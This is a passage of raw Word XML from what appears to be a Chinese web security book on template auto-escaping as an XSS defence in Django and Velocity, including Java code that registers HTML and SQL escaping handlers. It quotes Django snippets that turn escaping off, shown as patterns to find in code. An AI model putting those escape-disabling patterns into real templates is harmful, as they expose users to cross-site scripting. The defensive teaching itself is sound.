          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
          <w:shd w:fill="DADADA" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t>{{ data|safe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="16"/>
          <w:shd w:fill="DADADA" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
          <w:shd w:fill="DADADA" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t>}}</w:t>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="15"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1"/>
        <w:ind w:left="623"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>或者</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="7"/>
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:pict>
          <v:shape style="position:absolute;margin-left:12.72pt;margin-top:7.983281pt;width:411.15pt;height:30pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:paragraph;z-index:4264;mso-wrap-distance-left:0;mso-wrap-distance-right:0" type="#_x0000_t202" filled="true" fillcolor="#dadada" stroked="false">
            <v:textbox inset="0,0,0,0">
              <w:txbxContent>
                <w:p>
                  <w:pPr>
                    <w:spacing w:line="264" w:lineRule="auto" w:before="8"/>
                    <w:ind w:left="345" w:right="6254" w:hanging="317"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>{% autoescape off %} Hello {{ name }}</w:t>
                  </w:r>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:spacing w:line="181" w:lineRule="exact" w:before="0"/>
                    <w:ind w:left="28" w:right="0" w:firstLine="0"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>{% endautoescape %}</w:t>
                  </w:r>
                </w:p>
              </w:txbxContent>
            </v:textbox>
            <v:fill type="solid"/>
            <w10:wrap type="topAndBottom"/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="8"/>
        <w:rPr>
          <w:sz w:val="5"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="307" w:lineRule="auto" w:before="77"/>
        <w:ind w:left="203" w:right="223" w:firstLine="420"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
        </w:rPr>
        <w:t>为了方便，很多程序员可能会选择关闭 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>auto-escape</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-22"/>
        </w:rPr>
        <w:t>。要检查 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>auto-escape </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>是否被关闭也很简单，搜索代码里是否出现上面两种情况即可。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="309" w:lineRule="auto" w:before="158"/>
        <w:ind w:left="202" w:right="221" w:firstLine="401"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t>但是正如前文所述，最好的 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>XSS </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>防御方案，在不同的场景需要使用不同的编码函数，如</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t>果统一使用这 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>5 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-11"/>
        </w:rPr>
        <w:t>个字符的 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t>HtmlEncode</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
        </w:rPr>
        <w:t>，则很可能会被攻击者绕过。由此看来，这种 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>auto-escape </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t>的方案，看起来也变得不那么美好了。</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-19"/>
        </w:rPr>
        <w:t>具体 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>XSS </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>攻击的细节在本书“跨站脚本攻击”一章中有深入探讨）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="154"/>
        <w:ind w:left="604"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t>再看看非常流行的模板引擎 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-11"/>
        </w:rPr>
        <w:t>Velocity</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
        </w:rPr>
        <w:t>，它也提供了类似的机制，但是有所不同的是，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-11"/>
        </w:rPr>
        <w:t>Velocity</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="75"/>
        <w:ind w:left="203"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>默认是没有开启 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>HtmlEncode </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>的。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="10"/>
        <w:rPr>
          <w:sz w:val="17"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1"/>
        <w:ind w:left="604"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>在 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Velocity </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>中，可以通过 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Event Handler </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>来进行 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>HtmlEncode</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="7"/>
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:pict>
          <v:shape style="position:absolute;margin-left:12.72pt;margin-top:7.97625pt;width:411.15pt;height:30pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:paragraph;z-index:4288;mso-wrap-distance-left:0;mso-wrap-distance-right:0" type="#_x0000_t202" filled="true" fillcolor="#dadada" stroked="false">
            <v:textbox inset="0,0,0,0">
              <w:txbxContent>
                <w:p>
                  <w:pPr>
                    <w:spacing w:before="8"/>
                    <w:ind w:left="28" w:right="0" w:firstLine="0"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>eventhandler.referenceinsertion.class = org.apache.velocity.app.event.implement.</w:t>
                  </w:r>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:spacing w:line="266" w:lineRule="auto" w:before="18"/>
                    <w:ind w:left="28" w:right="4334" w:firstLine="0"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>EscapeHtmlReference eventhandler.escape.html.match = /msg.*/</w:t>
                  </w:r>
                </w:p>
              </w:txbxContent>
            </v:textbox>
            <v:fill type="solid"/>
            <w10:wrap type="topAndBottom"/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="8"/>
        <w:rPr>
          <w:sz w:val="5"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="77"/>
        <w:ind w:left="623"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>使用方法如下例，这里同时还加入了一个转义 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>SQL </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>语句的 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Event Handler</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="5"/>
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:pict>
          <v:shape style="position:absolute;margin-left:12.72pt;margin-top:7.904375pt;width:411.15pt;height:80.05pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:paragraph;z-index:4312;mso-wrap-distance-left:0;mso-wrap-distance-right:0" type="#_x0000_t202" filled="true" fillcolor="#dadada" stroked="false">
            <v:textbox inset="0,0,0,0">
              <w:txbxContent>
                <w:p>
                  <w:pPr>
                    <w:spacing w:before="8"/>
                    <w:ind w:left="28" w:right="0" w:firstLine="0"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>...</w:t>
                  </w:r>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:pStyle w:val="BodyText"/>
                    <w:spacing w:before="2"/>
                    <w:rPr>
                      <w:sz w:val="17"/>
                    </w:rPr>
                  </w:pPr>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:spacing w:before="0"/>
                    <w:ind w:left="28" w:right="0" w:firstLine="0"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>import org.apache.velocity.app.event.EventCartridge;</w:t>
                  </w:r>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:spacing w:line="266" w:lineRule="auto" w:before="18"/>
                    <w:ind w:left="28" w:right="1645" w:firstLine="0"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>import org.apache.velocity.app.event.ReferenceInsertionEventHandler; import org.apache.velocity.app.event.implement.EscapeHtmlReference; import org.apache.velocity.app.event.implement.EscapeSqlReference;</w:t>
                  </w:r>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:pStyle w:val="BodyText"/>
                    <w:spacing w:before="5"/>
                    <w:rPr>
                      <w:sz w:val="15"/>
                    </w:rPr>
                  </w:pPr>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:spacing w:before="1"/>
                    <w:ind w:left="108" w:right="0" w:firstLine="0"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>...</w:t>
                  </w:r>
                </w:p>
              </w:txbxContent>
            </v:textbox>
            <v:fill type="solid"/>
            <w10:wrap type="topAndBottom"/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
        <w:sectPr>
          <w:pgSz w:w="8740" w:h="14750"/>
          <w:pgMar w:header="930" w:footer="0" w:top="1380" w:bottom="280" w:left="80" w:right="60"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="5"/>
        <w:rPr>
          <w:sz w:val="6"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="174"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:pict>
          <v:shape style="width:411.15pt;height:329.65pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" type="#_x0000_t202" filled="true" fillcolor="#dadada" stroked="false">
            <w10:anchorlock/>
            <v:textbox inset="0,0,0,0">
              <w:txbxContent>
                <w:p>
                  <w:pPr>
                    <w:pStyle w:val="BodyText"/>
                    <w:spacing w:before="12"/>
                    <w:rPr>
                      <w:sz w:val="16"/>
                    </w:rPr>
                  </w:pPr>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:spacing w:before="0"/>
                    <w:ind w:left="28" w:right="0" w:firstLine="0"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>public class Test</w:t>
                  </w:r>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:spacing w:before="25"/>
                    <w:ind w:left="28" w:right="0" w:firstLine="0"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:w w:val="100"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>{</w:t>
                  </w:r>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:spacing w:before="25"/>
                    <w:ind w:left="187" w:right="0" w:firstLine="0"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>public void myTest()</w:t>
                  </w:r>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:spacing w:before="25"/>
                    <w:ind w:left="187" w:right="0" w:firstLine="0"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:w w:val="100"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>{</w:t>
                  </w:r>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:spacing w:before="23"/>
                    <w:ind w:left="345" w:right="0" w:firstLine="0"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>....</w:t>
                  </w:r>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:pStyle w:val="BodyText"/>
                    <w:spacing w:before="1"/>
                    <w:rPr>
                      <w:sz w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:spacing w:before="0"/>
                    <w:ind w:left="345" w:right="0" w:firstLine="0"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>/**</w:t>
                  </w:r>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:spacing w:before="25"/>
                    <w:ind w:left="427" w:right="0" w:firstLine="0"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>* Make a cartridge to hold the event handlers</w:t>
                  </w:r>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:spacing w:before="25"/>
                    <w:ind w:left="426" w:right="0" w:firstLine="0"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>*/</w:t>
                  </w:r>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:spacing w:before="25"/>
                    <w:ind w:left="345" w:right="0" w:firstLine="0"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>EventCartridge ec = new EventCartridge();</w:t>
                  </w:r>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:pStyle w:val="BodyText"/>
                    <w:spacing w:before="12"/>
                    <w:rPr>
                      <w:sz w:val="17"/>
                    </w:rPr>
                  </w:pPr>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:spacing w:before="0"/>
                    <w:ind w:left="345" w:right="0" w:firstLine="0"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>/*</w:t>
                  </w:r>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:spacing w:before="25"/>
                    <w:ind w:left="426" w:right="0" w:firstLine="0"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>* then register and chain two escape-related handlers</w:t>
                  </w:r>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:spacing w:before="25"/>
                    <w:ind w:left="426" w:right="0" w:firstLine="0"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>*/</w:t>
                  </w:r>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:spacing w:line="273" w:lineRule="auto" w:before="25"/>
                    <w:ind w:left="345" w:right="3441" w:firstLine="0"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>ec.addEventHandler(new EscapeHtmlReference()); ec.addEventHandler(new EscapeSqlReference());</w:t>
                  </w:r>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:pStyle w:val="BodyText"/>
                    <w:spacing w:before="11"/>
                    <w:rPr>
                      <w:sz w:val="15"/>
                    </w:rPr>
                  </w:pPr>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:spacing w:before="1"/>
                    <w:ind w:left="345" w:right="0" w:firstLine="0"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>/*</w:t>
                  </w:r>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:spacing w:before="25"/>
                    <w:ind w:left="426" w:right="0" w:firstLine="0"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>* and then finally let it attach itself to the context</w:t>
                  </w:r>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:spacing w:before="25"/>
                    <w:ind w:left="426" w:right="0" w:firstLine="0"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>*/</w:t>
                  </w:r>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:spacing w:before="25"/>
                    <w:ind w:left="345" w:right="0" w:firstLine="0"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>ec.attachToContext( context );</w:t>
                  </w:r>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:pStyle w:val="BodyText"/>
                    <w:spacing w:before="11"/>
                    <w:rPr>
                      <w:sz w:val="17"/>
                    </w:rPr>
                  </w:pPr>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:spacing w:before="0"/>
                    <w:ind w:left="345" w:right="0" w:firstLine="0"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>/*</w:t>
                  </w:r>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:numPr>
                      <w:ilvl w:val="0"/>
                      <w:numId w:val="31"/>
                    </w:numPr>
                    <w:tabs>
                      <w:tab w:pos="619" w:val="left" w:leader="none"/>
                    </w:tabs>
                    <w:spacing w:before="26"/>
                    <w:ind w:left="618" w:right="0" w:hanging="192"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>now merge your template with the context as you</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:spacing w:val="-13"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t> </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>normally</w:t>
                  </w:r>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:numPr>
                      <w:ilvl w:val="0"/>
                      <w:numId w:val="31"/>
                    </w:numPr>
                    <w:tabs>
                      <w:tab w:pos="619" w:val="left" w:leader="none"/>
                    </w:tabs>
                    <w:spacing w:before="25"/>
                    <w:ind w:left="618" w:right="0" w:hanging="192"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>do</w:t>
                  </w:r>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:spacing w:before="25"/>
                    <w:ind w:left="426" w:right="0" w:firstLine="0"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>*/</w:t>
                  </w:r>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:pStyle w:val="BodyText"/>
                    <w:spacing w:before="1"/>
                    <w:rPr>
                      <w:sz w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:spacing w:before="0"/>
                    <w:ind w:left="345" w:right="0" w:firstLine="0"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
